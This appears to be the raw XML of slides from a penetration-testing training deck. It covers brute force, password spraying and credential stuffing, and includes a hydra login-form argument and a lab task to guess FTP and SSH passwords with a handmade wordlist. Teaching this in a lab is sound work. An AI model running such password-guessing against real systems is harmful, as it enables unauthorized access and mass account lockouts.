            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>    "/login.php:user=^USER^&amp;pass=^PASS^:Invalid credentials"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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04 / CREDENTIALS</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Brute force, spraying and stuffing</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36</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1536192"/>
            <a:ext cx="3593592" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1737360"/>
            <a:ext cx="3063240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Brute force</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2176272"/>
            <a:ext cx="3063240" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Many passwords against one account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2880360"/>
            <a:ext cx="3063240" cy="1737360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Locks the account out within seconds on any modern system. Fine in a lab, career limiting in production.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1536192"/>
            <a:ext cx="3593592" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="1737360"/>
            <a:ext cx="3063240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Password spraying</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="2176272"/>
            <a:ext cx="3063240" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>One common password against many accounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="2880360"/>
            <a:ext cx="3063240" cy="1737360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Stays under the lockout threshold because each account only sees one or two failures. This is what real attackers do.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8138160" y="1536192"/>
            <a:ext cx="3593592" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="1737360"/>
            <a:ext cx="3063240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="2176272"/>
            <a:ext cx="3063240" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Leaked username and password pairs, replayed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="2880360"/>
            <a:ext cx="3063240" cy="1737360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No guessing at all. Works because people reuse the same password everywhere. This is how Colonial Pipeline started.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4956048"/>
            <a:ext cx="11091672" cy="1188720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2A0F1A"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5138928"/>
            <a:ext cx="10515600" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Think before you run it.  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>On a real engagement, hydra against a domain account can lock out a few hundred employees in under a minute. Ask about the lockout policy first, use -t 1, and agree with the client which accounts are off limits.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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170A2E"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text 0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="384048"/>
            <a:ext cx="5486400" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="160" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HANDS-ON  //  TASK 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13889"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>10 min</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="749808"/>
            <a:ext cx="9144000" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Guess a password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1517904"/>
            <a:ext cx="10789920" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Goal: get valid credentials for the target using a wordlist, and understand the noise you make.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2121408"/>
            <a:ext cx="11091672" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1728"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1038"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2377440"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT TO DO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2761488"/>
            <a:ext cx="10424160" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Build a small wordlist by hand: ten passwords you would expect on a 2008 Linux box</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Run hydra against FTP with the usernames from task 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Repeat against SSH with -t 4 and -V so you can watch the attempts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
